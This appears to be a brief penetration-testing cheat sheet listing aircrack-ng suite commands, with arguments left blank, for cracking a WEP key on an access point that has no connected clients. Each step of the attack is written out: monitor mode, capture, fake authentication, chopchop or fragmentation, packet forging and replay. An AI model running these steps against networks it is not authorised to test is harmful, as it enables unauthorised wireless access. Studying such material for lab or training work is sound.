clientless_wep_attack
CLIENTLESS WEP ATTACK
Clientless WEP Cracking Attack Summary
Place your wireless card into monitor mode on the channel number of the AP:
airmon-ng start
Start an Airodump-ng capture, filtering on the AP channel and BSSID, saving the capture:
airodump-ng -c --bssid -w
Conduct a fake authentication attack against the AP:
aireplay-ng -1 0 -e -a -h
Run attack 4, the KoreK chopchop attack (or attack 5, the fragmentation attack):
aireplay-ng -4 -b -h
Craft an ARP request packet using packetforge-ng:
packetforge-ng -0 -a -h -l -k -y
-w
Inject the packet into the network using attack 2, the interactive packet replay attack:
aireplay-ng -2 -r
Crack the WEP key using Aircrack-ng:
aircrack-ng
Last updated
Was this helpful?